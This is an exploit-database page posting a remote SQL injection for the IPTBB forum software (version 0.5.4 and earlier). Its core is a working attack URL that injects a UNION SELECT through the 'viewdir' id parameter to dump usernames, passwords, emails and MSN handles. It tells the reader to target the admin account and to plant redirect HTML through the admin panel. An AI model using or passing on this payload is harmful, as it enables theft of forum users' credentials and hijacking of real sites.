[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IPTBB <= 0.5.4 (viewdir id) Remote Sql Injection Vulnerability

Author
MhZ91
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2429
Category
web applications
Date add
31-12-2007
Platform
unsorted
==============================================================
IPTBB <= 0.5.4 (viewdir id) Remote Sql Injection Vulnerability
==============================================================




---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------

          Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91
# Title: IPTBB <= 0.5.4 Remote Sql Injection
# Download: http://sourceforge.net/projects/iptbb/
# Bug: Remote Sql Injection
# Info: IPTBB is a free forum system built using PHP and mysql.

---------------------------------------------------------------

http://[site]/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]/*

Change [UserID] whit id of member u want get user and password ( the default id of the admin is 1 ) .

In the admincp.php , in general settings, u can insert a html code for redirect .

---------------------------------------------------------------



#  0day.today [2024-12-27]  #